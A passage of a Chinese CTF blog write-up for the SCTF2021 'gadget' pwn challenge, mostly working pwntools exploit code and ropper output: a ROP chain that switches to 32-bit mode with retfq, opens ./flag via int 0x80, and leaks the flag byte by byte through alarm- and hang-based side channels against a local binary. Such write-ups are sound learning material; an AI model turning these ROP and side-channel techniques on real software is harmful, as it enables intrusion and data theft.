paylaod=payload.ljust(<span class="number">0x300</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">    sh.send(payload)</span><br><span class="line">    sleep(<span class="number">1</span>)</span><br><span class="line">    <span class="comment">#part3 alarm</span></span><br><span class="line">    payload=<span class="string">&#x27;\x00\x00\x00\x00\x00\x00\x00&#x27;</span>+p64(alarm)+p64(<span class="number">0</span>)+p64(pop_rsi_r15_rbp)+p64(push_rsi_ret)+p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">    payload+=p64(push_rsi_ret)</span><br><span class="line">    sh.send(payload)</span><br><span class="line">    start=time.time()</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        sh.recv()</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        end=time.time()</span><br><span class="line">        asc=<span class="built_in">int</span>(end-start)</span><br><span class="line">        <span class="keyword">global</span> flag</span><br><span class="line">        flag+=<span class="built_in">chr</span>(asc)</span><br><span class="line">        <span class="built_in">print</span> flag</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">     <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">30</span>):</span><br><span class="line">         pwn(i)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="运行效果-跑了快一个小时"><a href="#运行效果-跑了快一个小时" class="headerlink" title="运行效果(跑了快一个小时)"></a>运行效果(跑了快一个小时)</h2><p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20220119231414100.png" alt="image-20220119231414100"></p>
<p><img src="C:\Users\张鹏\AppData\Roaming\Typora\typora-user-images\image-20220119231430907.png" alt="image-20220119231430907"></p>
<p>拼接得到flag</p>
<h2 id="工具介绍–ropper"><a href="#工具介绍–ropper" class="headerlink" title="工具介绍–ropper"></a>工具介绍–ropper</h2><p>专门用来找gadget的工具，大部分时间比ROPgadget好用</p>
<p>启动并载入程序</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">rootzhang@ubuntu:~/get-shell/sctf2021/gadget$ ropper</span><br><span class="line"><span class="meta">(ropper)&gt;</span><span class="bash"> file ./gadget</span></span><br><span class="line">[INFO] Load gadgets from cache</span><br><span class="line">[LOAD] loading... 100%</span><br><span class="line">[LOAD] removing double gadgets... 100%</span><br><span class="line">[INFO] File loaded.</span><br></pre></td></tr></table></figure>

<p>搜索的时候可以直接搜自己想要的gadget,也可以使用search+gadget,模糊搜索的时候可以使用？，如下图</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">[INFO] Searching for gadgets: pop rdi</span><br><span class="line">[INFO] File: ./gadget</span><br><span class="line">0x0000000000407464: pop rdi; add byte ptr [rax], al; or cl, byte ptr [rdi]; pushfq; ret 0x59be; </span><br><span class="line">0x0000000000402be4: pop rdi; jmp rax; </span><br><span class="line">0x0000000000409db1: pop rdi; mov eax, 0xca; xor esi, esi; xor r10d, r10d; syscall; </span><br><span class="line">0x0000000000401734: pop rdi; pop rbp; ret; </span><br><span class="line"><span class="meta">(gadget/ELF/x86_64)&gt;</span><span class="bash"> search pop r?i</span></span><br><span class="line">[INFO] Searching for gadgets: pop r?i</span><br><span class="line">[INFO] File: ./gadget</span><br><span class="line">0x0000000000407464: pop rdi; add byte ptr [rax], al; or cl, byte ptr [rdi]; pushfq; ret 0x59be; </span><br><span class="line">0x0000000000402be4: pop rdi; jmp rax; </span><br><span class="line">0x0000000000409db1: pop rdi; mov eax, 0xca; xor esi, esi; xor r10d, r10d; syscall; </span><br><span class="line">0x0000000000401734: pop rdi; pop rbp; ret; </span><br><span class="line">0x0000000000407ca5: pop rsi; mov eax, 0xca; mov rdi, r9; syscall; </span><br><span class="line">0x0000000000402be2: pop rsi; pop r15; jmp rax; </span><br><span class="line">0x0000000000401732: pop rsi; pop r15; pop rbp; ret; </span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><h3 id="寻找gadget"><a href="#寻找gadget" class="headerlink" title="寻找gadget"></a>寻找gadget</h3><p>思路一般大家都能想到，但在不能shellcode的话最重要的就是寻找合适的gadget来构造攻击链了。gadget一般是利用栈进行值的传递然后调用函数，根据这个特性我把gadget分为四类</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">第一类利用pop传值</span><br><span class="line"><span class="meta">(gadget/ELF/x86_64)&gt;</span><span class="bash"> search pop|ret</span></span><br><span class="line">[INFO] Searching for gadgets: pop|ret</span><br><span class="line"></span><br><span class="line">[INFO] File: ./gadget</span><br><span class="line">0x000000000040288d: pop r12; pop r13; pop r14; pop r15; pop rbp; ret; </span><br><span class="line">0x000000000040172f: pop r12; pop r14; pop r15; pop rbp; ret; </span><br><span class="line">0x000000000040288f: pop r13; pop r14; pop r15; pop rbp; ret; </span><br><span class="line">0x0000000000402be1: pop r14; pop r15; jmp rax; </span><br><span class="line"></span><br><span class="line">第二类利用mov传值（这道题就用到了）</span><br><span class="line"><span class="meta">(gadget/ELF/x86_64)&gt;</span><span class="bash"> search mov|ret</span></span><br><span class="line">[INFO] Searching for gadgets: mov|ret</span><br><span class="line"></span><br><span class="line">[INFO] File: ./gadget</span><br><span class="line">0x0000000000404cbb: mov ah, 0x86; add byte ptr [rax], al; or cl, byte ptr [rdi]; pushfq; ret 0x8cbe; </span><br><span class="line">0x000000000040150c: mov ah, 0x8a; push rbp; fdivrp st(6); ret 0xf01; </span><br><span class="line">0x00000000004020f9: mov al, 0x40; add byte ptr [rsi + 0x8002], bh; syscall; </span><br><span class="line">0x000000000040213e: mov al, 0x94; je 0x2151; mov byte ptr [rbx + 0xb2353d], 0; or cl, byte ptr [rdi]; pushfq; ret 0x43bf; </span><br><span class="line"></span><br><span class="line">第三类利用寄存器加call函数调用</span><br><span class="line"><span class="meta">(gadget/ELF/x86_64)&gt;</span><span class="bash"> search call r??</span></span><br><span class="line">[INFO] Searching for gadgets: call r??</span><br><span class="line">[INFO] File: ./gadget</span><br><span class="line">0x0000000000402c0a: call r14; mov edi, eax; call 0x1010; ret; </span><br><span class="line">0x0000000000402c0b: call rsi; </span><br><span class="line">0x0000000000402c0b: call rsi; mov edi, eax; call 0x1010; ret; </span><br><span class="line">第四类系统调用，一般形式是syscall;ret 或者int80;ret</span><br><span class="line">x0000000000401165: syscall; pop rbp; ret; </span><br><span class="line">0x0000000000408865: syscall; ret; </span><br><span class="line"><span class="meta">(gadget/ELF/x86_64)&gt;</span><span class="bash"> search int 0x80</span></span><br><span class="line">[INFO] Searching for gadgets: int 0x80</span><br><span class="line"></span><br><span class="line">[INFO] File: ./gadget</span><br><span class="line">0x00000000004011f3: int 0x80; </span><br><span class="line">0x00000000004011f3: int 0x80; ret; </span><br></pre></td></tr></table></figure>

<p>rop的时候就搜索这四类就好了。</p>
<h2 id="不利用alarm进行侧信道爆破"><a href="#不利用alarm进行侧信道爆破" class="headerlink" title="不利用alarm进行侧信道爆破"></a>不利用alarm进行侧信道爆破</h2><p>在单线程的情况下使用alarm进行侧信道爆破十分之慢，上面我写的那个脚本要跑出全部的flag大概需要快一个小时，尝试跑了一下别人的利用gadget进行爆破速度快多了，所以打算学习一波。</p>
<p>侧信道的精髓就是不同的比较结果会影响程序流，我么可以使用脚本探测程序流的状况，从而达到推测比价结果得到flag。</p>
<p>问了ayoung佬他的gadget，在初期理解上出现了一点问题，我一直没搞懂cmp以后的比较结果到底体现在哪里，动态调试以后才搞懂体现在cmovnz指令上，比如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cmp     rax, [r15+38h]</span><br><span class="line">mov     eax, 0CD2CFCA4h</span><br><span class="line">mov     ecx, 0DF6F8009h</span><br><span class="line">cmovnz  eax, ecx</span><br><span class="line">jmp     loc_409269</span><br></pre></td></tr></table></figure>

<p>当cmp不相等的时候ecx传值给eax，相等的时候不传值，这两个寄存器对后面的程序流有影响，相等的时候程序陷入循环，不相等的时候程序报错退出可以用recv()对程序状态进行检测。</p>
<p>我的脚本是基于我原先脚本修改的（懒），由于改的有点问题，导致我对程序的rop控制出现了问题，多次动态调试才找见文件，哎。浪费了一下午。下面就是缝缝补补的脚本了。速度虽然快了但是成功率不是很高🤦‍♀️，应该跟我频繁的使用red函数有关系</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">flag=<span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">0x000000000040288d : pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040172f : pop r12 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040288f : pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401731 : pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401733 : pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401001 : pop rax ; ret</span></span><br><span class="line"><span class="string">0x0000000000402890 : pop rbp ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401102 : pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040172e : pop rbx ; pop r12 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000403072 : pop rbx ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040117b : pop rcx ; ret</span></span><br><span class="line"><span class="string">0x0000000000401734 : pop rdi ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401732 : pop rsi ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x000000000040288e : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401730 : pop rsp ; pop r14 ; pop r15 ; pop rbp ; ret</span></span><br><span class="line"><span class="string">0x0000000000401002 : ret</span></span><br><span class="line"><span class="string">0x0000000000402c04: mov rsi, r15; mov rdx, r12; call r14; mov edi, eax; call 0x1010; ret;</span></span><br><span class="line"><span class="string">x0000000000401102: pop rbp; ret;</span></span><br><span class="line"><span class="string">0x0000000000409d1c: pop rsp; mov edi, 0x88bf2838; ret;</span></span><br><span class="line"><span class="string">0x0000000000401001: pop rax; ret; </span></span><br><span class="line"><span class="string">0x00000000004011f3: int 0x80; ret;</span></span><br><span class="line"><span class="string">0x0000000000403072: pop rbx; pop r14; pop r15; pop rbp; ret;</span></span><br><span class="line"><span class="string">0x000000000040117b: pop rcx; ret;</span></span><br><span class="line"><span class="string">0x0000000000408865: syscall; ret;</span></span><br><span class="line"><span class="string">0x0000000000401732: pop rsi; pop r15; pop rbp; ret;</span></span><br><span class="line"><span class="string">0x00000000004011c5 : push rsi ; ret</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">push_rsi_ret=<span class="number">0x00000000004011c5</span></span><br><span class="line">alarm = <span class="number">0x40115D</span></span><br><span class="line">sys_ret=<span class="number">0x0000000000408865</span></span><br><span class="line">pop_rcx=<span class="number">0x000000000040117b</span></span><br><span class="line">pop_rbx_r14_r15_rbp=<span class="number">0x0000000000403072</span></span><br><span class="line">int80_ret=<span class="number">0x00000000004011f3</span></span><br><span class="line">retfq = <span class="number">0x4011ec</span></span><br><span class="line">bss_base=<span class="number">0x40c000</span>+<span class="number">0x1000</span></span><br><span class="line">pop_rax=<span class="number">0x0000000000401001</span></span><br><span class="line">pop_rdi_rbp=<span class="number">0x0000000000401734</span></span><br><span class="line">pop_rsi_r15_rbp=<span class="number">0x0000000000401732</span></span><br><span class="line">pop_rbp=<span class="number">0x0000000000401102</span></span><br><span class="line">sys_read=<span class="number">0x40119A</span></span><br><span class="line">pop_r12_r14_r15_rbp=<span class="number">0x000000000040172f</span></span><br><span class="line">mov_rsi_rdx_call_r14=<span class="number">0x0000000000402c04</span></span><br><span class="line">pop_rsp_mov_edi=<span class="number">0x0000000000409d1c</span></span><br><span class="line">ret=<span class="number">0x0000000000401002</span></span><br><span class="line">pop_rax=<span class="number">0x0000000000401001</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwn</span>(<span class="params">num,ans</span>):</span></span><br><span class="line">    <span class="built_in">print</span> <span class="built_in">str</span>(num)+<span class="string">&quot;==&gt;&quot;</span>+<span class="built_in">chr</span>(ans)</span><br><span class="line">    sh=process(<span class="string">&#x27;./gadget&#x27;</span>)</span><br><span class="line">    <span class="comment">#gdb.attach(sh,&quot;b *0x408F72&quot;)</span></span><br><span class="line">    <span class="comment">#part1 stack&amp;read</span></span><br><span class="line">    payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x38</span>+p64(pop_rax)+p64(<span class="number">0</span>)+p64(pop_rdi_rbp)+p64(<span class="number">0</span>)+p64(bss_base)</span><br><span class="line">    payload+=p64(pop_r12_r14_r15_rbp)+p64(<span class="number">0x300</span>)+p64(sys_read)+p64(bss_base)+p64(bss_base)</span><br><span class="line">    payload+=p64(mov_rsi_rdx_call_r14)+p64(pop_rsp_mov_edi)+p64(bss_base+<span class="number">0x8</span>)</span><br><span class="line">    sh.send(payload.ljust(<span class="number">0xc0</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">    <span class="comment">#part2 retf&amp;open&amp;read</span></span><br><span class="line">    payload=<span class="string">&#x27;./flag\x00\x00&#x27;</span>+p64(retfq)+p64(ret)+p64(<span class="number">0x23</span>)</span><br><span class="line">    payload+=p32(pop_rax)+p32(<span class="number">5</span>)+p32(pop_rbx_r14_r15_rbp)+p32(bss_base)*<span class="number">4</span></span><br><span class="line">    payload+=p32(pop_rcx)+p32(<span class="number">0</span>)+p32(int80_ret)+p32(retfq)+p32(ret)</span><br><span class="line">    payload+=p32(<span class="number">0x33</span>)+p64(pop_rax)+p64(<span class="number">0</span>)+p64(pop_rdi_rbp)+p64(<span class="number">3</span>)+p64(bss_base)</span><br><span class="line">    payload+=p64(sys_ret)+p64(pop_rdi_rbp)+p64(<span class="number">0</span>)*<span class="number">2</span>+p64(pop_rsi_r15_rbp)</span><br><span class="line">    payload+=p64(bss_base+<span class="number">1</span>+num)*<span class="number">2</span>+p64(bss_base+<span class="number">8</span>+num)+p64(pop_rax)+p64(<span class="number">0</span>)+p64(sys_ret)+p64(pop_rsp_mov_edi)+p64(bss_base+<span class="number">8</span>+num)</span><br><span class="line">    payload=payload.ljust(<span class="number">0x300</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">    sh.send(payload)</span><br><span class="line">    <span class="comment">#part3 alarm</span></span><br><span class="line">    payload=<span class="string">&#x27;\x00\x00\x00\x00\x00\x00\x00&#x27;</span>+p64(pop_rsi_r15_rbp)+p64(<span class="number">0</span>)+p64(bss_base-<span class="number">0x38</span>+num)*<span class="number">2</span></span><br><span class="line">    payload+=p64(pop_rax)+p64(ans)+p64(<span class="number">0x408F72</span>)</span><br><span class="line">    sh.sendline(payload)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        sh.recv(timeout=<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        sh.close()</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">global</span> flag</span><br><span class="line">        flag+=<span class="built_in">chr</span>(ans)</span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;flag:&quot;</span>+flag</span><br><span class="line">        sh.close()</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">40</span>):</span><br><span class="line">        <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x22</span>,<span class="number">0x7f</span>):</span><br><span class="line">            s=pwn(i,m)</span><br><span class="line">            <span class="keyword">if</span> s==<span class="number">1</span>:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/17/mips%E5%88%9D%E4%BD%93%E9%AA%8C/" rel="prev" title="mips初体验">
      <i class="fa fa-chevron-left"></i> mips初体验
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/01/22/HGAME/" rel="next" title="HGAME">
      HGAME <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#sctf2021-gadget"><span class="nav-number">1.</span> <span class="nav-text">sctf2021 gadget</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#64%E4%BD%8D%E7%A8%8B%E5%BA%8F%E8%BD%AC32%E4%BD%8D"><span class="nav-number">1.1.</span> <span class="nav-text">64位程序转32位</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%E5%8D%81%E4%BA%8C%E4%BD%8D%E4%BD%BF%E7%94%A8int80%E8%B0%83%E7%94%A8open"><span class="nav-number">1.2.</span> <span class="nav-text">三十二位使用int80调用open</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#alarm%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB"><span class="nav-number">1.3.</span> <span class="nav-text">alarm侧信道攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%87%8D%E7%82%B9%EF%BC%9A%E5%BD%93%E6%89%A7%E8%A1%8C%E5%AE%8Calarm%E5%87%BD%E6%95%B0%E5%90%8E%E5%BE%97%E8%AE%A9%E7%A8%8B%E5%BA%8F%E9%99%B7%E5%85%A5%E6%AD%BB%E5%BE%AA%E7%8E%AF%EF%BC%8C%E4%B8%8D%E7%84%B6%E6%89%A7%E8%A1%8C%E5%AE%8Calarm%E5%87%BD%E6%95%B0%E5%B0%B1%E7%9B%B4%E6%8E%A5%E9%80%80%E5%87%BA%E7%A8%8B%E5%BA%8F%E4%BA%86%EF%BC%8C%E4%B8%8D%E8%83%BD%E8%BE%BE%E5%88%B0%E6%88%91%E4%BB%AC%E6%83%B3%E8%A6%81%E7%9A%84%E7%9B%AE%E7%9A%84%EF%BC%8C%E6%AF%94%E5%A6%82%E8%BF%99%E4%B8%AArop"><span class="nav-number">1.3.0.1.</span> <span class="nav-text">重点：当执行完alarm函数后得让程序陷入死循环，不然执行完alarm函数就直接退出程序了，不能达到我们想要的目的，比如这个rop</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE"><span class="nav-number">1.4.</span> <span class="nav-text">题目</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%90%E8%A1%8C%E6%95%88%E6%9E%9C-%E8%B7%91%E4%BA%86%E5%BF%AB%E4%B8%80%E4%B8%AA%E5%B0%8F%E6%97%B6"><span class="nav-number">1.5.</span> <span class="nav-text">运行效果(跑了快一个小时)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B7%A5%E5%85%B7%E4%BB%8B%E7%BB%8D%E2%80%93ropper"><span class="nav-number">1.6.</span> <span class="nav-text">工具介绍–ropper</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.7.</span> <span class="nav-text">总结</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AF%BB%E6%89%BEgadget"><span class="nav-number">1.7.1.</span> <span class="nav-text">寻找gadget</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8D%E5%88%A9%E7%94%A8alarm%E8%BF%9B%E8%A1%8C%E4%BE%A7%E4%BF%A1%E9%81%93%E7%88%86%E7%A0%B4"><span class="nav-number">1.8.</span> <span class="nav-text">不利用alarm进行侧信道爆破</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">rootzhang</p>
  <div class="site-description" itemprop="description">我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rootzhang</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
